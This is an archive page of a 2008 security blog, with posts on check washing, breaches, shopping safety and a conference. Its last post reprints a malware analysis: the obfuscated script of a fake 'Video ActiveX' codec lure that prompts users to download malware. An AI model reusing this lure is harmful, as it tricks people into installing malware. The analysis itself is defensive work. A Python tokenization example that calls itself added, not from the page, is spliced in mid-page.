Monday, December 29, 2008

OWASP Comment... W T F

Hey all, ordinarily I wouldn't post crap like this, but a friend sent me this over IM, so it's really his fault...

I hit the link and I about wet myself laughing. First off, the comment demonstrates an utter lack of comprehension of the subject being berated... and don't even get me started on the unicorn and flowery background...

Anyway - Kyle... I'd like to offer you some intelligent thoughts...but then I realized I don't like to publicly criticize people... so I'll just leave it at that.

Tuesday, December 23, 2008

Uni-Ball 207 vs. "Check Washing" ... (part 2)

First off, the response to this post has been awesome, thanks to everyone who's Google'd it, emailed it to their friends/family/co-workers, etc... Let's keep the tide of awareness going.

Thanks to Steve Gradman, Sr. Brand Manager from the Uni-Ball division of the Sanford Corp, for his email reply - lots of valuable information. I guess this and the previous post have really raised more questions than I've had answers to previously, so here are some of the things I've questioned, and some additional answers I'm still hazy about...
  • First, if you have no idea what this is all about, you should check out this video on YouTube from FarFromBoring which demonstrates how criminals "wash" checks and other legal documents using acetone to remove dye-based inks. Obviously the targets of this are prescriptions or checks (or other legal documents) which require your signature
  • Why should you care? - If you write checks, or mail important documents (or maybe transport them somehow) you should care. Every legal document could be a target - more often than not with the aim of making money
  • Besides checks - prescriptions are another major target - doctors are you listening?
  • Just about anyone can do a "check wash"... Acetone is simple to acquire
  • So why are there still dye-based pens being sold?
  • Are there any drawbacks to pigment-based inks?
I sent an email asking for some additional information from Steve Gradman, and he was kind enough to reply here...
  1. What prompted Sanford (Uni-Ball) to pursue research in "secure" ink? It was through a number of security experts suggesting people sign their checks with a uni-ball 207 some years ago due to the pigmented ink formula that was impervious to chemical washing. That was the hallmark of our marketing on the 207 franchise which is now our number one seller. Since then we have been working to expand that formula to nearly the entire product line so people could simply think of any uni-ball with uni-super-ink as their first line of defense in protecting their assets.
  2. Can you share any market research or metrics on the incidents of "document washing" fraud with me? Check fraud is about an $850 million problem; criminal check washing of personal accounts is about a $70MM problem (according to the American Bankers Association). We still write $39 billion checks a year according to Frank Abagnale, and while that number is declining the value of each check is actually increasing.
  3. Would you say that dye-based inks are antiquated and should be replaced globally? There are still a lot of applications that benefit from dye-based ink like fashion colors, fluorescent, sparkles etc; signing documents isn't one of them.
  4. Why wouldn't Sanford (or any instrument company) convert all pens to pigmented ink? Are there draw-backs to this ink technology? There are no drawbacks but there is a lack of flexibility and color creation is much more difficult than with a dye based ink. However, a uni-ball “uni-super-ink” pigment ink is more vibrant and is fade and water resistant as well as considered archival quality vs. dye inks.
Wow - great information. If anyone has any additional information that would make sense adding to this post - please let me know and I will happily add it.


Monday, December 22, 2008

UniBall - Pen Companies vs Theft Protection

Merry Christmas everyone!

I'm sitting here on my first day of vacation, away from work but always vigilant on matters of security and identity theft... interesting where these topics creep up. As I was watching the Giants vs. Panthers last night I caught a commercial for the Uni-Ball 207 pen. It caught my attention because the actor peddling the pen was S. Epatha Merkerson (of Law & Order fame...I think) and the topic was of course identity theft... interesting.

Interestingly enough I had to do some research into why this pen warranted my $3 (per unit), and here's what I found. This site has some details, and even an endorsement by Catch Me If You Can professional check fraud expert Frank Abagnale. Still, I always thought a pen was a pen, but this site will tell me otherwise.

From their fact sheet:

Helps Prevent Check Fraud:
Uni-ball 207 gel pens use specially formulated inks that contain color pigments, which are absorbed into a check's paper fibers. When an individual tries to "wash" the information written on the check, the ink is in effect "trapped", making the act of check fraud more difficult.

So, not all pens are created equal? I guess I wasn't aware that physical check fraud or other physical identity theft was that prevalent... sounds like something I'm going to have to do some more research into. Maybe the folks at Sanford (here in Oak Brook, IL) can shed some additional light on the subject?

Saturday, December 20, 2008

"Incidents buried in back-page press"

Article From [ ]

Published: December 20, 2008

Regional Briefs: UNCSA tells its students to monitor credit

Officials at the UNC School of the Arts say they are notifying current and former students that their names and Social Security numbers "may have been accidentally exposed" in a security breach involving a university computer server.

The server in question went online in July 2003. The security breach occurred in May of 2006 and affected about 2,700 students who were enrolled between 2003 and 2006.

Each of these students is being notified. The group includes summer-session students and 256 of the 1,162 students currently enrolled at the school.

"We have no reason to believe that the personal information was stolen, used inappropriately or even accessed," Lisa Smith, the chief information officer at UNCSA, said in a statement. "However, we are notifying the affected parties so that they might take steps to monitor their credit to ensure their identities have not been stolen."

School officials say they became aware of the breach last week. They say they are still trying to determine its cause.

The N.C. Attorney General's Office has been notified.

School officials say they are conducting tests to ensure the future safety of personal data.

Perhaps I just don't get it; and maybe I'm reading far too deep into this alleged "incident"... but if I'm a student at this school I'm furious. There are 2 highlights here that should get you thinking about how seriously loss of personal information is being taken.

Without getting on my soap-box, I'd simply like to comment that if the incident took place in May 2006, and the officials were notified last week - something is desperately wrong here. That's 2 and a half years that have passed since the breach and they're finding out about it now? Even in the most absolutely inefficient and idiotic of administrations this isn't possible. Something smells like rotting fish here.

Thwarted by YoVille

Yoville sucks... but more on that in a second.

Well, I officially started my "mandatory" 2-weeks vacation courtesy of HP today and I figured I'd start it off by converting my wife's malware-ridden WindowsXP laptop to something less security-issue-prone. Naturally I picked Ubuntu (8.10) since that's what my workstation at home (formerly Vista Ultimate) runs.....

Everything was going so well. I'd managed to convince her that this OS would be faster (which it was, booted in 30 seconds versus a minute and 30 seconds); and this OS would be more stable, more flexible, more "cool" and definitely (and most importantly, to me anyway) more secure.

Everything was rocking until she hopped on Facebook, and then went to meet some of her virtual friends on Yoville!... and that's where things went sideways.

Apparently, all the security and extensibility in the world was no match for a broken Flash 10 plug-in. Apparently, Flash 10 doesn't work so well in Ubuntu 8.10; and it breaks Yoville.

Dammit. I was so close... so close.

This undoubtedly proves my point - security without the usability of "cool" is never going to catch on.

Thursday, December 18, 2008

Breach Leads to Better Security


Call me a skeptic, but when a company that's just experienced a major data breach says "we're fixing the problem", I'm a little leery. Honestly, when Innisbrook says that as a result of a recent data breach...

"Since the incident, Innisbrook has replaced the affected servers, installed better security software and stopped storing people's credit card information entirely..."
I may believe a lot of stupid things, but I wasn't born yesterday. I wonder how much this little "incident" has cost them in lost revenue, eDiscovery, notification and other costs as a result of the data breach? I think it's rather interesting that places like this start to think about security after the fact... when it's already too late.


Wednesday, December 17, 2008

Failed - The 5 Reasons Why...

Failed: Information Security and Data Protection in a Consumer Digital World by Rafal Los on 15/12/08

Hello everyone, just thought I'd take a minute to say that my paper was accepted and published on 12/15/2008. Direct link included above for your reading pleasure.

I published this myself a while back but it's nice to see it formalized and available permanently now - I continue to welcome your comments and thoughts on the paper or the topic.


Tuesday, December 16, 2008

You're [In]Secure Online

Thinking of going shopping online this holiday season? Think again.

Between the scammers, spammers, and security gaffes out there it's just not the type of environment you want to enter your credit card into. What's worse, your browser may be out to get you too! With all that risk... let's look at the real problems with transacting online this holiday season, or any other time...
  1. Obviously credit card companies (even the PCI certified ones) just suck at security (see this blog entry for a start)
  2. This isn't the first article to say online shopping is going to be like running blind through a mine-field (see here)
  3. Your browser (if it's IE) is going to get you hacked and you won't even know it! (see here, or google it)
  4. Banks certainly don't seem to care all too much about security, as they have huge flaws themselves that'll allow their users to be phished or scammed (see here, or google for yourself)
So with that... why would you want to take your shopping or browsing online? Go to the stores, hit the mall, tell online retailers and your credit card companies that you refuse to be the victim in their pathetic attempt to evade having to implement good security. Take a stand!

OK, that may be a bit over-the-top, I know... but it gets my point across. Here are some simple tips for keeping yourself relatively safe online this season... (or when-ever)
  • Never, ever, ever follow a link you get in an email - if you get an email from your bank telling you to "click here to continue/login to your account" DON'T. Go to your bank's website or call their 800 number and report the incident!
  • Use one-time credit card numbers - your credit card company, if they're of any value, will have this available somewhere on their website. Generating a one-time credit card number means that you're safe even if someone steals the entire database of card numbers from the PCI Certified merchant you're buying online from...
  • Never use your debit card online - ... because unlike with a credit card, your money is gone instantly ... without the ability to dispute, etc
  • Never use your debit card w/PIN - online or at a store, never, ever use your PIN number at a merchant (even at a brick-and-mortar store) because who knows how good their security is, and again (see point above) once your PIN is lost, you're hosed!
  • Stop using Internet Explorer - while this is just a good rule to follow every-day (because no good can come from using ActiveX) now it's even more critical with the serious flaw Microsoft refuses to patch (and yes, there are exploits out there right now for it)
  • Be aware - Be smart and aware of what's going on. If something doesn't seem right, close the browser (ALT + F4) and don't go back to that page...
  • Update your anti-virus - although anti-virus doesn't help much these days, make sure you're at least updated. If you want advice on the best one out there to use... Kaspersky is what I trust my (Windows) PC to... and I visit some seriously icky sites...
That's it... that's the best advice I can offer, and hopefully you'll pass this along to friends, family, and co-workers. It's vital that we stay vigilant against stupidity, companies that don't care, and foreign threats.

Merry Christmas.

Monday, December 15, 2008

Trust me, I'm your browser...

Ryan Naraine over at ZDNet published an interesting article on a new story from Chapin Information Services about the security of password-storage mechanisms in your browser.
Now, I read this and immediately thought... do I even store passwords in my browser? Duh... no! But that led to a much deeper thought. I read down some of the comments people have left and came to the conclusion that most of the people that read that post missed the point entirely. Rather than arguing whether open-source Mozilla is better or closed-source MS IE is better... why aren't we looking at why in the world someone would trust their passwords to a browser? Look, there are dozens of reasons why this is a bad idea before you even start, not the least of which is that no matter what the browser, at some point there has been a vuln that made the security mechanism completely useless. Aside from that, the purpose of a browser, boys and girls, is what? That's right, it's to render and display web-based content. It's *not* to manage passwords to web sites and applications.

This whole thing has me thinking (which is sort of dangerous around the holidays...) why someone hasn't written a BHO or Mozilla plug-in that masquerades as a "password manager" and simply steals all your passwords (all your passwords are belong to teh hax0r). Oh... no, wait - that's been done.

Sunday, December 14, 2008

CSIS Takes 16 Months to Research Obvious

On December 8th, 2008 the Center for Strategic and International Studies (CSIS) released a report titled "Securing Cyberspace for the 44th Presidency"
"...that recommends that President-elect Obama establish a new National Office for Cyberspace in the Executive Office of the President and appoint a new assistant for cyberspace to run that office."

As I read that on GSN Magazine's online site I couldn't help but think to myself... duh? The report proposes a merging of the existing National Cyber Security Center and the Joint Inter-Agency Cyber Task Force - and work for the National Security Council. The new office would be called the National Office for Cybersecurity (NOC)... This report makes a few interesting points...
  1. I can't believe it takes a group of intelligent people 16 months to make this recommendation
  2. Cyber Security is finally going to be taken seriously at the National Security Council level
  3. It's taken incident after incident for our government to take cyber security seriously
  4. The BSA jumped in immediately after the report was released... and agered (??)
  5. The report recommends the government only buy "secure" products and services - but notes that those standards are yet to be developed...
  6. The NOC (National Office for Cyberspace) should be working with NIST (National Institute of Standards and Technology) to protect SCADA systems powering America's critical infrastructure
Incredibly, those of us who have been working in information security for years could have probably made these points and similar recommendations with about 5 seconds of thought... not 16 months of research. Again... an excellent waste of time to make an obvious point.

Friday, December 12, 2008

Security Philosophy: What does it all mean?

Hey folks - I know it's basically the weekend and I should be headed out but it's been an insane 2 weeks at the office and I just have to get some stuff out of my brain and onto this blog before it falls out to make room for other crap.

This post isn't so much a rant as it is a philosophical approach to a long career protecting IT assets in the field known as IT Security.

Since 1999 I've been working and learning IT Security. Over the years my thinking has evolved from purely seeing things in black and white to a rainbow of shades of gray. I have a few key points here now for your consideration...
  • Security is shades of gray. Over the years I've learned that I cannot give a real answer to the question: Is this asset secure? The reason I can't say yes ever, is because I'd be lying. You security pragmatists know exactly what I'm talking about. We've consistently failed to make an impact to management because we just can't answer the "am I secure yet?" question. The answer is always no.
  • Security isn't an end-game. We're never going to reach a state within our respective arenas whether that's where you work, or where you consult, where we've "won". The bad guys are always going to keep coming, there will be new holes to fill tomorrow, and new security challenges. Most of us see that as a glass half-full because (a) we'll never be out of a job and (b) we've always got something new to do... but it's tiring knowing you're never going to get there.
  • The business doesn't actually care. I've said it. Poll just about any business leader out there and they'll tell you they're doing many things to secure their customer and themselves from hackers. Dig into that or sit in on a project meeting from the inside... and you quickly realize that's crap. Sure, they're willing to invest heavily in security as long as it's unobtrusive, simple, and free. My colleague Russ McRee over at continually proves that banks, of all verticals, posture themselves as having great security - but in actuality care very very little.
  • It's nearly impossible to measure good security. Isn't that the sad truth? Good security is nearly impossible to measure. How can you tell your upper-management that today you stopped a hacker from stealing a million credit cards from your database? You can't. You can't even say with any reasonable certainty that you've ever done that. We're all selling life insurance folks, hoping the patient doesn't die before we get a chance to cash our paychecks.
This brings me to the main point I've been building up to... and I hope it's almost obvious at this point. I've been asking myself lately... what is it that I've accomplished? Have I made the world a safer place by tirelessly fighting the corporate machine to be more security-minded? Have I moved that needle at all? I'd like to think that I have, and I'd like to say that between the awareness & evangelization, project work in corp. america, and my personal crusades I've changed at least a few important people's minds to be more security conscious. But how do I measure that? The sales folks at my day job measure their success by the dollar revenue they generate for the company... how do I measure my worth to my employer? How do any of us?

I know what you're thinking, what a way to start a weekend... but it's been building over the past several months and I've got some research coming soon that'll help make me feel a little better. Stay tuned. And don't let your job drive you to drinking :)

SFO Airport - Security Assessment RFP

In case anyone out there is interested, San Francisco Airport has issued an RFP for a full-scale assessment of all of their physical and digital security measures. I find it interesting that the expected price tag is around $375,000 over the course of the engagement. That's a lot of money to spend, but absolutely necessary.

I've flown through SFO a time or two, and believe me they're going to find a trove of security vulnerabilities in that airport... assuming they can get through the ridiculous lines and terrible inefficiencies of that place.


Thursday, December 4, 2008

Ronald McDonald Goes Rogue

CyberINSecure is running a story that just made me laugh. Some scammers are preying on stupid McDonald's users...

It's not that the first page is suspect - because it looks like a legitimate survey. It's the 2nd page that has me baffled. What retarded monkey would enter their credit card information like this? I mean, if someone's going to offer you money to take a survey, why in the world would they want your credit card number and information [and PIN]?! Unreal....

Wednesday, December 3, 2008

Santa's GMail Hacked - Is *nothing* sacred?

This screen shot says it all... although I suspect it's a mock-up given the convenient placement of advertisements, emails, and gTalk messages.

Funny nonetheless, and appropriate for the season.

Tuesday, December 2, 2008

Yes - they ARE out to get you

Folks, if you've missed this (or don't read DarkNet regularly) you need to see this. Yes, people *are* out to get you ... well, your browser more specifically. There have been browser exploitation frameworks in the past, true, but this release of Browser Rider is aiming to be the Cadillac of browser exploitation (minus the annoying bongs... Top Gear reference).

Check out Browser Rider - Web Exploitation Framework...

And if you REALLY want to freak yourself out... check out the demo, middle-bottom of the page. Yea... it's bad.

Monday, December 1, 2008

Friends Don't Let Friends Hack... and Do Drugs

... and this is exactly why:

Whiskey Tango Foxtrot?!

I'm not sure who should be redder (more red?) in the face - Luxottica Retail or the "hacker". First off... if you're Luxottica you've got huge problems... and not because someone just stole data, although that would appear to be a problem in itself. No, you have problems because they stole it off your mainframe... which should be buried deep within the annals of your company's security onion. Look, one of two situations is true. Either the company has terrible security and allows "outsiders" to ride their virtual rails straight to mainframe equipment (which is deplorable), or they had (gulp) a mainframe attached to a web page somewhere - which should have them brought up on charges... of stupidity for one thing. The situation is unclear on whether this was a web application hack, but if it was - wowza! I've been in several environments where a mainframe is just a screen-scraper-appliance away, but those systems have to be rigorously controlled and are generally installed by default to be stupid-resistant. I'm not even going to guess at the exact cause until it's announced (if it ever is, which I doubt) - but this next quote has me on the floor laughing...
"A routine check by the information technology department discovered that a hacker had been inside a computer mainframe and downloaded the personal information of more than 59,000 former workers."

Obviously it wasn't routine enough, eh?

As for the "Heroin Hacker"... wow. Brings the phrase "Out in a Blaze of Glory" to new heights huh?

Sunday, November 30, 2008

All-Time Best 404

Hope you're all having a good close to the long weekend...

I just had to share this. As I'm reading some posts and catching up from being off my computer for the last 2 days or so... I hit this on accident:

This is perhaps the best 404 ever.

Wednesday, November 26, 2008

Thanksgiving 2008...Give Thanks and Be Grateful

Happy Thanksgiving everyone, first and foremost.

Now let's get to it. Given that you're probably reading this on your day off, expecting family over or headed out yourself I will keep it short.

Thanksgiving Day here in the United States brings us to the thought of family, charity - and generally giving thanks for the blessings and good fortune in our lives. This year, on the eve of the US holiday, Mumbai was attacked by terrorists, and held hostage. From what I've been able to gather from news reports, interviews, feeds and articles, the whole attack was perpetrated by several people with a relatively low-tech attack. While the attacks were low-tech they were precise, deadly, and make no mistake... locked down the entire city of Mumbai and killed at least 20, and injured at least 900. As the toll rises, I can't help but think of the ramifications for security and the blistering speed of "westernization" that India is undergoing.

I can't even begin to guess the percentage of companies that have data, infrastructure, and people over in India who will be impacted by this incident. The ramifications are much more severe than the burned buildings and the hotels, cafes, and tourist spots leveled. There was a significant loss of life - but think of it this way - how easy was this?! From every report I've been able to find these attacks were simple to execute, and inflicted maximal damage with relatively little firepower. How protected is your physical and intellectual property overseas? Terrorism isn't just about killing people (although sometimes you wouldn't notice) but it's about disrupting Western life. Taking out a few major data centers, development centers, and IT centers in India would absolutely devastate many Western companies that are heavily outsourced into India and beyond.

So this Thanksgiving holiday... ask yourself how insulated your company is from catastrophic issues in the event this attack in Mumbai was just a pre-cursor to something much, much bigger.

Try not to choke on that turkey leg.


Sunday, November 23, 2008

A Perspective on National Security

My newswire inbox has been flooded over the past few days with articles about President-elect Obama's phone records being breached by unknown Verizon Wireless employees.

Then there was the matter of Sarah Palin's Yahoo! email being hacked (actually, password-hint guessed) which took center stage right as the election started to heat up down the stretch...

... and McCain and Obama's websites were hacked during the course of the election, multiple times as a matter of claims.

This brings me to what I want to draw your attention to - national security.  At which point in these data breaches did we cross over into a threat to national security?

Some would argue it happened when Palin's email was "hacked into"... possibly - but you have to ask yourself what sort of twit would discuss matters of national security over public webmail!

Others have tried to argue that Obama or McCain's sites being hacked was a matter of national security ... please, seriously?

This brings me to the matter of Obama's cell phone records being snooped. Depending on which version of the story you believe, one of Obama's people says that the cell phone that was snooped on hadn't been used for a while, OK - but work with me on this one. Cell phone records (numbers called, if voicemail was left, and such) are a dangerous tool. Imagine if someone knew who you called - they could certainly use that to say, blackmail you, once you were in a position of power. Call me a conspiracy theorist, but I'd say this could be a far more dangerous situation and requires Secret Service attention... not the ridiculous things they and the FBI have been chasing lately.

You have to wonder... is our notion of national security in the digital realm as well-focused as it should be? Do we properly understand the threats? Furthermore, does our government, the people who send the big guns and write the laws, have the proper grasp of technology that it should?

My obvious answer would be ... no.  So to the incoming President - please hire someone with a clue?

As a cynical side-note, someone identified as "Jeff" left this comment:

November 21st, 2008 9:54 pm ET

With all the wiretappings going on via Bush's WOT, why didn't Homeland Security discover this?

---Good one Jeff.

Tuesday, November 18, 2008

CSI Conference 2008 - Notes

Hey folks, in my other blog I published an entry of notes from the App Sec Summit, CSI Annual Conference here in Washington, DC.

Please give it a read, as it's a lot simpler to cross-post a link rather than re-writing the blog entry all over again.

Check it out!

Monday, November 17, 2008

CSI 2008 - First Thoughts

So... my first impressions of this Computer Security Institute [CSI] 2008 conference here in National Harbor, MD - as follows:

  • Lots of people are here from all sorts of companies, and of all kinds of ranks, from all over the Americas (I saw name tags from Canada as well as the US; with CISOs, architects and engineers present)

  • The F5 "Email Station" kiosks - essentially a bunch of laptops which you can check email from. Seriously? At a security conference? And yes... there were people walking up and using webmail on these laptops. More proof that even with our own ranks, security people aren't paranoid enough - think keyloggers!

The morning's keynote was given in part by Brian Snow, of NSA fame. He had some bulletpoints I think would be good take-aways for everyone, my commentary is included:
  • "Better security" isn't a product we can sell to people, so it isn't happening effectively. Companies are in the business of making products (and selling them) and not securing you/us.

  • "Solving ahead" is a design process step by which we address all conceivable possible attacks against a "thing" before that thing is sent off for production. This process involves thinking many steps ahead of the initial attack and requires some smart people during the design phases... do you have those at your company?

  • An interesting topic (although not a new one) was brought back up about minimizing the contextual value of data - meaning, data stolen from one domain needs to be without value in another domain. How do we solve this issue? Credit card companies are already doing this with one-time use credit card numbers... what about other data?

  • Designers of software/hardware/stuff allow for bad decisions to be made by end-users. Why? This is a lot tougher to root out than you may think, people want those 'bad choices' in their options.

  • Learn to speak executive. If you don't have the ability to translate our "security geek" language into execu-speak you're going to continue to fail to make your point.
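Brian Snow's point about minimizing the contextual value of data, and the one-time credit card numbers recommended in the "You're [In]Secure Online" post above, both come down to tokenization: the real card number lives in exactly one place, and everything else holds a random, domain-bound stand-in. The block below is an added illustration, not code from this page, from Brian Snow's talk or from any card network; the vault class, the scope names and the test card number are made up, and the vault is a plain in-memory dictionary standing in for a real service.

```python
import secrets

# Added illustration of scope-bound, optionally single-use tokenization.
# Everything here (class, scope names, the sample PAN) is made up for the example.


class TokenVault:
    """Holds the only copy of each real card number (PAN).

    Every other system receives a token that is:
      * random, so it cannot be inverted offline (no hash of the PAN, no encryption);
      * bound to one scope (merchant, domain), so a token dumped from merchant A
        is refused when presented by merchant B;
      * optionally single-use, which is the model behind one-time card numbers.
    """

    def __init__(self):
        self._entries = {}  # token -> (pan, scope, single_use)

    def tokenize(self, pan, scope, single_use=False):
        if not (pan.isdigit() and 12 <= len(pan) <= 19):
            raise ValueError("PAN must be 12-19 digits")
        token = "tok_" + secrets.token_urlsafe(24)   # 192 random bits, unrelated to the PAN
        self._entries[token] = (pan, scope, single_use)
        return token

    def detokenize(self, token, scope):
        """Return the PAN, or None if the token is unknown, belongs to another
        scope, or was single-use and has already been spent."""
        entry = self._entries.get(token)
        if entry is None:
            return None
        pan, bound_scope, single_use = entry
        if bound_scope != scope:
            return None                  # stolen from one domain, worthless in another
        if single_use:
            del self._entries[token]     # spend it: a replay gets None
        return pan


def mask(pan):
    """What a merchant may keep alongside the token: the last four digits only."""
    return "*" * (len(pan) - 4) + pan[-4:]


def breach_value(vault, stolen_tokens, attacker_scope):
    """Simulate an attacker replaying a dumped merchant table under a scope they
    control; returns how many of the stolen tokens still resolve to a real PAN."""
    return sum(1 for t in stolen_tokens if vault.detokenize(t, attacker_scope) is not None)


if __name__ == "__main__":
    vault = TokenVault()
    pan = "4111111111111111"                         # made-up test number
    merchant_a = [vault.tokenize(pan, "merchant-a") for _ in range(3)]
    print(mask(pan), merchant_a[0])
    print("replay under merchant-b resolves:", breach_value(vault, merchant_a, "merchant-b"))
    one_time = vault.tokenize(pan, "merchant-a", single_use=True)
    print(vault.detokenize(one_time, "merchant-a"), vault.detokenize(one_time, "merchant-a"))
```

The design choice worth noticing is that the token is random rather than derived from the PAN: a hash or a deterministic encryption would let whoever steals the merchant table test candidate card numbers offline, which is exactly the cross-domain value the scheme is supposed to remove.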

As a side note... are you an INTJ? How does that affect the way you design and solve problems? Think about it.

More soon...

Sunday, November 16, 2008

Nov 17th - CSI Conference

Hey everyone, as you read this I'll be attending the CSI Conference in National Harbor, MD.

Over the next 3 days I'll cover the conference, and some of the events, sessions and discussions that take place. This year promises to be one that we address how to fix some of the issues we've uncovered over the course of the past year or so. I was invited by Robert Richardson since I've been complaining publicly about the lack of "so now what" solutions to the problems we face and find.

Stay tuned, if you can't be here, hopefully I'll be able to convey some good information.

In the mean time, check out this weird case of Identity Theft uncovered in upstate New York. This has got to be one of the strangest [undated] "hacks" I've heard of recently. Hacking eBay isn't a new concept, neither is identity theft... but I thought this was rather clever.


Sunday, November 9, 2008

Facebook Worm/Hack Follow-Up...

If you haven't read the previous post on the FaceBook "email hack/possible worm", you can read it here first.

In response to the post, my friend Rob Ragan was kind enough to spend some of his time dissecting it and provided further analysis... Here is that analysis. Thanks to Rob for this.


Some googling after dissecting the info below yielded this:

Writes out
{script src="" /}

which contains

Which then gives a 302 redirect to

Which has an iframe like so
{IFRAME src="" height="100%" width="100%" border="0"}
Which gives us a final destination of
and this screen shot.

Thanks to all this:
{script language="javascript" src=""}{/script}
{script language="javascript" src=""}{/script}
{script language="jscript.encode" src=""}{/script}

{html lang="en-EN"}
{meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /}
body,td,th,tr,a,img {cursor:default;}
#mainbody {background-color:#000;}
#movie {border:1px solid #fff;}
#movie a {cursor:pointer;}
?function detecting(){
var testObject = new ActiveXObject("mu"+"lti"+"me"+"di"+"aCo"+"ntro"+"ls.c"+"hl");
return true;

return false;

function releaseMovie() {
if (detecting()) {
document.getElementById('playMov').innerHTML = '{embed src="" width="480" height="400" autostart="true" type="movie/mpg"}{/embed}';
}function codecDownload()
if (window.navigator.userAgent.indexOf("SV1") != -1 || window.navigator.userAgent.indexOf("MSIE 7") !=-1) {
else {
window.setTimeout("location.href=''", 3000);

{body id="mainbody"}{script}

var transcode = new Array;
window.transcode[0] = 'V'+'i'+'d'+'eo Act'+'iv'+'eX Obj'+'ect E'+'r'+'ror.\n\nY'+'o'+'ur brow'+'ser ca'+'nnot pl'+'a'+'y this vi'+'de'+'o file.\nCli'+'ck \'OK\' to dow'+'nlo'+'ad an'+'d install mis'+'sing V'+'id'+'eo Act'+'ive'+'X O'+'bj'+'ec'+'t.';
window.transcode[1] = 'Pl'+'e'+'as'+'e ins'+'ta'+'ll ne'+'w ve'+'rs'+'i'+'on of V'+'id'+'e'+'o Ac'+'ti'+'ve'+'X Ob'+'je'+'ct.';
window.transcode[2] = 'Yo'+'u m'+'us'+'t do'+'wn'+'lo'+'ad V'+'id'+'eo A'+'ct'+'iv'+'eX O'+'bject t'+'o pl'+'ay th'+'is v'+'ideo f'+'ile.';




var Drag = {
obj : null,
init : function(o, oRoot, minX, maxX, minY, maxY, bSwapHorzRef, bSwapVertRef, fXMapper, fYMapper)
o.onmousedown = Drag.start;

o.hmode = bSwapHorzRef ? false : true ;
o.vmode = bSwapVertRef ? false : true ;

o.root = oRoot && oRoot != null ? oRoot : o ;

if (o.hmode && isNaN(parseInt( ))) = "0px";
if (o.vmode && isNaN(parseInt( ))) = "0px";
if (!o.hmode && isNaN(parseInt( ))) = "0px";
if (!o.vmode && isNaN(parseInt( = "0px";

o.minX = typeof minX != 'undefined' ? minX : null;
o.minY = typeof minY != 'undefined' ? minY : null;
o.maxX = typeof maxX != 'undefined' ? maxX : null;
o.maxY = typeof maxY != 'undefined' ? maxY : null;

o.xMapper = fXMapper ? fXMapper : null;
o.yMapper = fYMapper ? fYMapper : null;

o.root.onDragStart = new Function();
o.root.onDragEnd = new Function();
o.root.onDrag = new Function();

start : function(e)
var o = Drag.obj = this;
e = Drag.fixE(e);
var y = parseInt(o.vmode ? :;
var x = parseInt(o.hmode ? : );
o.root.onDragStart(x, y);

o.lastMouseX = e.clientX;
o.lastMouseY = e.clientY;

if (o.hmode) {
if (o.minX != null) o.minMouseX = e.clientX - x + o.minX;
if (o.maxX != null) o.maxMouseX = o.minMouseX + o.maxX - o.minX;
} else {
if (o.minX != null) o.maxMouseX = -o.minX + e.clientX + x;
if (o.maxX != null) o.minMouseX = -o.maxX + e.clientX + x;

if (o.vmode) {
if (o.minY != null) o.minMouseY = e.clientY - y + o.minY;
if (o.maxY != null) o.maxMouseY = o.minMouseY + o.maxY - o.minY;
} else {
if (o.minY != null) o.maxMouseY = -o.minY + e.clientY + y;
if (o.maxY != null) o.minMouseY = -o.maxY + e.clientY + y;

document.onmousemove = Drag.drag;
document.onmouseup = Drag.end;

return false;

drag : function(e)
e = Drag.fixE(e);
var o = Drag.obj;

var ey = e.clientY;
var ex = e.clientX;
var y = parseInt(o.vmode ? :;
var x = parseInt(o.hmode ? : );
var nx, ny;

if (o.minX != null) ex = o.hmode ? Math.max(ex, o.minMouseX) : Math.min(ex, o.maxMouseX);
if (o.maxX != null) ex = o.hmode ? Math.min(ex, o.maxMouseX) : Math.max(ex, o.minMouseX);
if (o.minY != null) ey = o.vmode ? Math.max(ey, o.minMouseY) : Math.min(ey, o.maxMouseY);
if (o.maxY != null) ey = o.vmode ? Math.min(ey, o.maxMouseY) : Math.max(ey, o.minMouseY);

nx = x + ((ex - o.lastMouseX) * (o.hmode ? 1 : -1));
ny = y + ((ey - o.lastMouseY) * (o.vmode ? 1 : -1));

if (o.xMapper) nx = o.xMapper(y)
else if (o.yMapper) ny = o.yMapper(x)[o.hmode ? "left" : "right"] = nx + "px";[o.vmode ? "top" : "bottom"] = ny + "px";
Drag.obj.lastMouseX = ex;
Drag.obj.lastMouseY = ey;

Drag.obj.root.onDrag(nx, ny);
return false;

end : function()
document.onmousemove = null;
document.onmouseup = null;
Drag.obj.root.onDragEnd( parseInt([Drag.obj.hmode ? "left" : "right"]),
parseInt([Drag.obj.vmode ? "top" : "bottom"]));
Drag.obj = null;

fixE : function(e)
if (typeof e == 'undefined') e = window.event;
if (typeof e.layerX == 'undefined') e.layerX = e.offsetX;
if (typeof e.layerY == 'undefined') e.layerY = e.offsetY;
return e;

function Downloadings(download,e)
if (e!=null && e.keyCode==27)
{ Close();
switch (download)
case "iax": document.location.href=""; break;


function tracking() {
if (confirm(window.transcode[0])) {
else {
if (alert(window.transcode[1])) {
else {

function Close()
var p=document.getElementById("popdiv");"hidden";
function Details()


{div name="popdiv" id="popdiv" onKeyPress="Downloadings('iax',event);" style="visibility:hidden; z-index:1;position:absolute;top:0px;left:0px;"}
{table width="474" cellpadding="0" cellspacing="0"}
{td height="28" width="8" style="background-image:url(/img/vista-ltc.gif);"}{/td}
{td height="28" width="458" style="background-image:url(/img/vista-bgtop.gif);"}
{table width="458" cellpadding="0" cellspacing="0"}
{td style="font-size: 12px; font-family:Segoe UI; color: #000000; padding-top:5px; padding-left: 6px;" id="w_title"}{/td}
{script} document.getElementById('w_title').innerHTML = "V"+"ide"+"o Ac"+"tiv"+"eX Ob"+"je"+"ct Er"+"ro"+"r.";{/script}
{td width="28" style="padding-top:6px; padding-right: 2px;"}{img src="/img/vista-close.gif" width="28" height="15" border="0" onClick="Close();" style="cursor:default;" /}{/td}
{td height="28" width="8" style="background-image:url(/img/vista-rtc.gif);"}{/td}
{td width="8" style="background-image:url(/img/vista-bgleft.gif);"}{/td}
{td width="458" style="background-image:url(/img/vista-1x1.gif);"}
{table width="458" cellpadding="0" cellspacing="8" style="padding-top:18px; padding-bottom:18px; background-image:url(/img/vista-1x1.gif);" align="center"}
{td width="32" style="padding-left: 18px; vertical-align: top;"}{img src="/img/vista-alert.gif" width="32" height="32" border="0" /}{/td}
{td style="font-size: 12px; font-family:Segoe UI; text-align:justify; padding-left: 4px; padding-right: 20px;" id="w_content"}
